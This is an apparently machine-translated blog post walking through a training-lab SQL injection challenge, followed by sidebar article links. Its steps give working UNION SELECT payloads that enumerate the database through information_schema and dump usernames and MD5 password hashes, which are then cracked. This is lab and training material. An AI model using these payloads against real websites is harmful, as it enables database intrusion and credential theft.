当前位置:网站首页>Mozi college SQL injection solution
Mozi college SQL injection solution
2020-11-08 09:40:00 【osc_7bgz0no1】
One · Judgment injection
Input id=1, Normal return . Input id=-1 Returns an error . from This shows that there is injection .
Two · Judgment fields
URL id=-1 order by 1
URL id=-1 order by 2
URL id=-1 order by 3
URL id=-1 order by 4
URL id=-1 order by 5 An error at this time , The description has four fields
3、 ... and · Use union Query injection point
Input union select 1,2,3,4
Find out 2,3 For the obvious note point
Four · Use database() Chaku name
Input union select 1,database(),3,4
Find out the name of the library mozhe_Discuz_StormGroup
5、 ... and · Look up the name of the table
Input
union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=‘mozhe_Discuz_StormGroup’
Query to StormGroup_member,notice
See member, So doubt about the first one . So first look up the first .
6、 ... and · Inquire about StormGroup_member The fields stored in the
Input
union select 1,group_concat(column_name)3,4 from information_schema.columns where table_name=‘StormGroup_member’
Query out id,name,password,status
7、 ... and · Query password and user name
union select 1,group_concat(name,0x3a,password),3,4 from StormGroup_member
obtain md5 Encrypted value . To decrypt , Get the code .
If the password is wrong , adopt limit m,n To continue with the inquiry .
8、 ... and · Submit key
After getting the password, you can see key, Copy , Submit .
版权声明
本文为[osc_7bgz0no1]所创,转载请带上原文链接,感谢
边栏推荐
- 麦格理银行借助DataStax Enterprise (DSE) 驱动数字化转型
- Is there a big difference between i5 1135g7 and i51035g1? Which is better?
- M 端软件产品设计思虑札记 - 知乎
- 函数周期表丨筛选丨值丨SELECTEDVALUE - 知乎
- Which is more worth starting with the difference between vivos7e and vivos7
- Architect (November 2020)
- Improvement of rate limit for laravel8 update
- 2020-11-05
- vivoS7e和vivoS7的区别 哪个更值得入手
- How can a technician take over a complex system?
猜你喜欢
Dogs can also operate drones! You're right, but it's actually an autonomous drone - you know
Is blazor ready to serve the enterprise?
Deeplight Technology Bluetooth protocol SRRC certification services
Search and replace of sed
IOS learning note 2 [problems and solutions encountered during the installation and use of cocopods] [update 20160725]
Visual studio 2015 unresponsive / stopped working problem resolution
高并发,你真的理解透彻了吗?
Architect (November 2020)
Oops, the system is under attack again
比Python快20%,就问你兴不兴奋?
随机推荐
Mate 40系列发布 搭载华为运动健康服务带来健康数字生活
Spotify是如何推动数据驱动决策的?
PX4添加新的应用
面部识别:攻击类型和反欺骗技术
Six key points of data science interview
【总结系列】互联网服务端技术体系:高性能之数据库索引
How did Julia become popular?
Test requirements for MIC certification of Bluetooth 2.4G products in Japan
Codeforce算法题 | 你能想出解法,让你的基友少氪金吗?
print( 'Hello,NumPy!' )
Do you really understand the high concurrency?
Recommend an economic science video, very valuable!
Web novice problem of attacking and defending the world
Review the cloud computing application scenarios you didn't expect (Part 1)
比Python快20%,就问你兴不兴奋?
技术人员该如何接手一个复杂的系统?
Face recognition: attack types and anti spoofing techniques
Function periodic table filter value selectedvalue
The most detailed usage guide for perconaxtradbcluster8.0
How does spotify drive data-driven decision making?